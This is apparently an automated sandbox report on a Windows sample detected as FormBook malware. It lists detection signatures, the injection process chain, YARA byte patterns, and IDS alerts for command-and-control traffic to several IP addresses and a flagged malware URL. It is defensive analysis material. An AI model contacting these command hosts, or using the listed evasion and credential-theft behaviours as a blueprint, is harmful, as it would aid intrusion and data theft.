
Windows Analysis Report
0XLuA614VK.exe

Overview

General Information

Sample name: 0XLuA614VK.exe
renamed because original name is a hash value
Original sample name: 4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52.exe
Analysis ID: 1504851
MD5: 562cb5dcba0e691bf01ab2c020c0837e
SHA1: 3ca5eb915edcce7da20a7b6046055cb11333647e
SHA256: 4399aa607bbc0faabced85f15b59b4d01a50d79da07f8d6bc825e358ad417e52
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for reading data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connections (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file name is different from the original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 0XLuA614VK.exe (PID: 2956 cmdline: "C:\Users\user\Desktop\0XLuA614VK.exe" MD5: 562CB5DCBA0E691BF01AB2C020C0837E)
    • svchost.exe (PID: 6400 cmdline: "C:\Users\user\Desktop\0XLuA614VK.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • sXmdPDASzrmzi.exe (PID: 2672 cmdline: "C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msiexec.exe (PID: 5304 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • firefox.exe (PID: 2300 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x86b44:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x700e3:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e755:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17cf4:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
(11 entries in total)

Source | Rule | Description | Author | Strings
2.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2d2d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16872:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
2.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
2.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2e0d3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17672:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ParentImage: C:\Users\user\Desktop\0XLuA614VK.exe, ParentProcessId: 2956, ParentProcessName: 0XLuA614VK.exe, ProcessCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ProcessId: 6400, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ParentImage: C:\Users\user\Desktop\0XLuA614VK.exe, ParentProcessId: 2956, ParentProcessName: 0XLuA614VK.exe, ProcessCommandLine: "C:\Users\user\Desktop\0XLuA614VK.exe", ProcessId: 6400, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T14:24:29.528469+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 49711 | 199.59.243.226 | 80 | TCP
2024-09-05T14:24:53.108803+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57195 | 72.52.178.23 | 80 | TCP
2024-09-05T14:25:14.634365+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57199 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:36.174460+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57203 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:58.268529+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57207 | 162.0.213.94 | 80 | TCP
2024-09-05T14:26:12.167470+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57211 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:25.546426+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57215 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:38.962807+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57219 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:52.280815+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57223 | 34.149.87.45 | 80 | TCP
2024-09-05T14:27:05.588486+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57227 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:19.681884+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57231 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:41.175589+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57235 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:49.709341+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57236 | 199.59.243.226 | 80 | TCP
2024-09-05T14:28:02.888098+0200 | 2050745 | 1 | Malware Command and Control Activity Detected | 192.168.2.5 | 57240 | 72.52.178.23 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T14:24:29.528469+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 49711 | 199.59.243.226 | 80 | TCP
2024-09-05T14:24:53.108803+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57195 | 72.52.178.23 | 80 | TCP
2024-09-05T14:25:14.634365+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57199 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:36.174460+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57203 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:58.268529+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57207 | 162.0.213.94 | 80 | TCP
2024-09-05T14:26:12.167470+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57211 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:25.546426+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57215 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:38.962807+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57219 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:52.280815+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57223 | 34.149.87.45 | 80 | TCP
2024-09-05T14:27:05.588486+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57227 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:19.681884+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57231 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:41.175589+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57235 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:49.709341+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57236 | 199.59.243.226 | 80 | TCP
2024-09-05T14:28:02.888098+0200 | 2855465 | 1 | A Network Trojan was detected | 192.168.2.5 | 57240 | 72.52.178.23 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T14:24:45.410661+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57192 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:47.999882+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57193 | 72.52.178.23 | 80 | TCP
2024-09-05T14:24:50.562697+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57194 | 72.52.178.23 | 80 | TCP
2024-09-05T14:25:06.999734+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57196 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:09.543696+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57197 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:12.097318+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57198 | 15.197.240.20 | 80 | TCP
2024-09-05T14:25:28.483319+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57200 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:31.040913+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57201 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:33.548178+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57202 | 199.59.243.226 | 80 | TCP
2024-09-05T14:25:50.658954+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57204 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:53.204047+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57205 | 162.0.213.94 | 80 | TCP
2024-09-05T14:25:55.738624+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57206 | 162.0.213.94 | 80 | TCP
2024-09-05T14:26:04.426223+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57208 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:06.979323+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57209 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:09.504074+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57210 | 13.248.151.237 | 80 | TCP
2024-09-05T14:26:17.952179+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57212 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:20.494766+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57213 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:23.015896+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57214 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:31.226240+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57216 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:33.887796+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57217 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:36.447900+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57218 | 91.203.110.247 | 80 | TCP
2024-09-05T14:26:44.499385+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57220 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:47.030980+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57221 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:49.688095+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57222 | 34.149.87.45 | 80 | TCP
2024-09-05T14:26:57.961604+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57224 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:00.476532+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57225 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:03.017249+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57226 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:11.584928+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57228 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:14.189519+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57229 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:17.145172+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57230 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:33.552885+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57232 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:36.110585+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57233 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:38.652932+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57234 | 199.59.243.226 | 80 | TCP
2024-09-05T14:27:55.252464+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57237 | 72.52.178.23 | 80 | TCP
2024-09-05T14:27:57.753496+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57238 | 72.52.178.23 | 80 | TCP
2024-09-05T14:28:00.299708+0200 | 2855464 | 1 | A Network Trojan was detected | 192.168.2.5 | 57239 | 72.52.178.23 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-09-05T14:25:12.097318+0200 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.5 | 57198 | 15.197.240.20 | 80 | TCP



            AV Detection

Source: http://www.rigintech.info/ig9u/?V6h=DsbZHDl7ETyucOGSRMDREU0gLqon/JCM1qPnn3cy3RxLEFGk9lVuu2W6wSDxGu+YER8koFm75cmrGcIzTbmZQ3LhDYrene07E1oxIZlh9GtUu7RZMRKLFDCiJnSgV5dMHg==&sH=nVVHdDTx2PSTVJ | Avira URL Cloud: Label: malware
Source: http://www.rigintech.info/ig9u/ | Avira URL Cloud: Label: malware
Source: 0XLuA614VK.exe | ReversingLabs: Detection: 60%
Source: Yara match | File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000002.00000002.2203489925.0000000005000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4491976479.0000000006A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4487941986.0000000002590000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2202835266.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2203112079.0000000003480000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4487732507.0000000000110000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.4487977474.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.4488832936.00000000041A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: 0XLuA614VK.exe | Joe Sandbox ML: detected
Source: 0XLuA614VK.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000002.00000003.2171842746.000000000301A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2171888846.000000000303B000.00000004.00000020.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2279705899.00000000010A9000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.00000000010A5000.00000004.00000001.00020000.00000000.sdmp, sXmdPDASzrmzi.exe, 00000003.00000003.2141716372.000000000109B000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4487730096.000000000005E000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: 0XLuA614VK.exe, 00000000.00000003.2044530612.0000000003A70000.00000004.00001000.00020000.00000000.sdmp, 0XLuA614VK.exe, 00000000.00000003.2044779565.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.2203138542.0000000003600000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2111792201.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2203138542.000000000379E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2113590946.0000000003400000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000004.00000003.2203188667.00000000040B9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488723938.0000000004410000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000004.00000003.2212872655.0000000004267000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: sXmdPDASzrmzi.exe, 00000003.00000002.4490540012.00000000045EC000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000004.00000002.4488021727.0000000002663000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000004.00000002.4489252166.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.2496207434.000000003B6FC000.00000004.80000000.00040000.00000000.sdmp
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose | 0_2_00F8DBBE
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F5C2A2 FindFirstFileExW | 0_2_00F5C2A2
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F968EE FindFirstFileW,FindClose | 0_2_00F968EE
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime | 0_2_00F9698F
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F8D076
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F8D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose | 0_2_00F8D3A9
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F99642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F99642
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F9979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose | 0_2_00F9979D
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F99B2B FindFirstFileW,Sleep,FindNextFileW,FindClose | 0_2_00F99B2B
Source: C:\Users\user\Desktop\0XLuA614VK.exe | Code function: 0_2_00F95C97 FindFirstFileW,FindNextFileW,FindClose | 0_2_00F95C97
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4_2_0012BF20 FindFirstFileW,FindNextFileW,FindClose | 4_2_0012BF20
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then pop edi | 3_2_06A29F51
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then pop edi | 3_2_06A28C87
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then pop edi | 3_2_06A28D01
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then xor eax, eax | 3_2_06A2D295
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then mov esp, ebp | 3_2_06A27A61
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then pop edi | 3_2_06A280CF
Source: C:\Program Files (x86)\tDCzgUpqMpyFtrEZKjWXqEXSFoaiZJoViUUxeRKTJygWDziRLNg\sXmdPDASzrmzi.exe | Code function: 4x nop then pop ebx | 3_2_06A29918
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then xor eax, eax | 4_2_00119760
Source: C:\Windows\SysWOW64\msiexec.exe | Code function: 4x nop then mov ebx, 00000004h | 4_2_041B053E

            Networking

Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57195 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57195 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57198 -> 15.197.240.20:80
Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.5:57198 -> 15.197.240.20:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57194 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57193 -> 72.52.178.23:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:49711 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:49711 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57196 -> 15.197.240.20:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57203 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.5:57203 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.5:57202 -> 199.59.243.226:80
Source: Network traffic | Suricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.5:57207 -> 162.0.213.94:80
